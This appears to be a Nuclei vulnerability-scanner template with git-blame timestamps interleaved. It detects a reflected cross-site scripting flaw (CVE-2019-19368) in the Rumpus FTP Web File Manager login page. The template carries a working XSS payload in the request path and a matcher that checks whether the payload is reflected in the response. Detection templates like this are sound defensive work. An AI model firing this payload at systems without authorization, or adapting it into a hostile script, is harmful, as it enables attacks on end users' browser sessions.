2021-01-02 04:59:06 +00:00
id : CVE-2019-19368
2020-04-08 13:05:45 +00:00
info :
2022-09-08 13:28:46 +00:00
name : Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
2020-04-08 13:05:45 +00:00
author : madrobot
2020-05-25 07:49:06 +00:00
severity : medium
2022-09-08 13:28:46 +00:00
description : Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/harshit-shukla/CVE-2019-19368/
2022-05-17 09:18:12 +00:00
- https://www.maxum.com/Rumpus/Download.html
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-19368
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-19368
cwe-id : CWE-79
2022-08-27 04:41:18 +00:00
tags : xss,ftp,packetstorm,cve,cve2019
2020-04-08 13:05:45 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 13:05:45 +00:00
matchers :
- type : status
status :
2020-05-25 07:49:06 +00:00
- 200
2020-04-08 13:20:31 +00:00
- type : word
2020-04-08 13:24:48 +00:00
words :
2020-05-25 07:49:06 +00:00
- "value=''><sVg/OnLoAD=alert`1337`//'>"
2020-04-08 13:05:45 +00:00
part : body
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/08/31